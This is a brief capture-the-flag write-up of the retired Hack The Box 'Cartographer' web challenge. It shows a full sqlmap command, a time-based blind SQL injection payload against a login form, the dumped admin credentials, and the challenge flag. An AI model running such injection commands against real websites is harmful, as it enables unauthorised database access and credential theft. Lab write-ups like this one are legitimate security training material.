2 minutes
Cartographer
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info ¶
Cartographer [by Arrexel]
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?
The Challenge ¶
Visting the web page, we see a login form.

Some testing with sqlmap reveal the login form is vulnerable to SQL injection. The DBMS is MySQL.
Eventually I find that the cartographer DB is the one holding interesting data.
$ sqlmap -u http://docker.hackthebox.eu:36230/ -p username,password --data="username=user&password=pass" --dbms=MySQL --level=5 --risk=3 --predict-output --skip="privileges" -D cartographer --exclude-sysdbs --dump
sqlmap identified the following injection point(s) with a total of 143 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ&password=pass
---
[... skipped for brevity ...]
[15:41:00] [INFO] fetching tables for databases: 'cartographer, information_schema, mysql, performance_schema, sys'
[15:50:10] [INFO] fetching columns for table 'users' in database 'cartographer'
[15:50:10] [INFO] retrieved: username
[15:50:39] [INFO] retrieved: password
[15:51:09] [INFO] fetching entries for table 'users' in database 'cartographer'
Database: cartographer
Table: users
[1 entry]
+----------+------------------------------+
| username | password |
+----------+------------------------------+
| admin | mypasswordisfuckinawesome123 |
+----------+------------------------------+
With these credentials, we attempt to login on the web page.
The credentials work, and we are redirected to: http://docker.hackthebox.eu:36230/panel.php?info=home

Attempting to bruteforce the info parameter didn’t help me much further, nor did attempting any SQL injection or path traversal.
In the end I sought some inspiration on the forums, where it was hinted I should try to enter the thing I was looking for: the flag!
The flag ¶
Visiting http://docker.hackthebox.eu:36230/panel.php?info=flag
finally reveals the treasure/flag:
HTB{Map_Th3_Pl4n3t}
```